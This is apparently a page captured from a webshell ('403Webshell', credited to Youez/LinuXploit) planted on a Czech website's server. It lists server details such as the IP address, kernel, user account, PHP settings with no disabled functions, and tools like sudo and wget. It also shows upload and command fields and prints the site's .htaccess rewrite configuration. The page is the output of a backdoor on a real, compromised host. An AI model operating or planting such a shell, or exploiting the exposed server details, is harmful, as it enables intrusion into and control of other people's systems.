403Webshell
Server IP : 37.9.174.138  /  Your IP : 216.73.216.117
Web Server : Apache
System : Linux vps6.backend.sk 6.12.100+deb13-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.12.100-1 (2026-07-30) x86_64
User : ftpuser ( 1001)
PHP Version : 8.4.24
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : ON
Directory :  /var/www/html/ttjs.cz/dev/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/html/ttjs.cz/dev/.htaccess
Options Indexes FollowSymLinks
RewriteEngine On

# Allow Let's Encrypt
RewriteRule ^\.well-known/ - [L]

# Block hidden files and folders
RewriteRule "(^|/)\." - [F,L]

<Files *.php> 
    Order Deny,Allow
    Deny from all
    Allow from 127.0.0.1
</Files> 

<Files index.php>
    Order Allow,Deny
    Allow from all
</Files>

<Files download.php>
    Order Allow,Deny
    Allow from all 
</Files>

<Files devutils.php>
    Order Allow,Deny
    Allow from all
</Files>

<Files json_parser.php>
    Order Allow,Deny
    Allow from all
</Files>

RewriteCond %{HTTP_HOST} ^www\.(.*)$ [NC]
RewriteRule ^(.*)$ https://%1/$1 [R=301,L]

RewriteCond %{HTTPS} !on
RewriteRule (.*) https://%{HTTP_HOST}%{REQUEST_URI} [R=301,L]


#<Files distribute.php>
#    Order Allow,Deny
#    Allow from all
#</Files>

#RewriteCond %{HTTP_HOST} ^[^.]+\.[^.]+$
#RewriteRule ^(.*)$ http://www.%{HTTP_HOST}/$1 [L,R=301]
#
#RewriteCond %{HTTPS} off [NC]
#RewriteRule .* https://%{HTTP_HOST}%{REQUEST_URI} [L,R=301]

RewriteRule ^([a-zA-Z0-9_-]+)$ index.php?paramq=$1
RewriteRule ^([a-zA-Z0-9_-]+)/$ index.php?paramq=$1
RewriteRule ^([a-zA-Z0-9_-]+)/([^/]*)/$ index.php?paramq=$1&parama=$2
RewriteRule ^([a-zA-Z0-9_-]+)/([^/]*)/([^/]*)/$ index.php?paramq=$1&parama=$2&paramb=$3
RewriteRule ^([a-zA-Z0-9_-]+)/([^/]*)/([^/]*)/([^/]*)/$ index.php?paramq=$1&parama=$2&paramb=$3&paramc=$4
RewriteRule ^([a-zA-Z0-9_-]+)/([^/]*)/([^/]*)/([^/]*)/([^/]*)/$ index.php?paramq=$1&parama=$2&paramb=$3&paramc=$4&paramd=$5
RewriteRule ^([a-zA-Z0-9_-]+)/([^/]*)/([^/]*)/([^/]*)/([^/]*)/([^/]*)/$ index.php?paramq=$1&parama=$2&paramb=$3&paramc=$4&paramd=$5&parame=$6

ErrorDocument 404 /404-nenalezeny
ErrorDocument 403 /403-pristup-zamitnut





Youez - 2016 - github.com/yon3zu
LinuXploit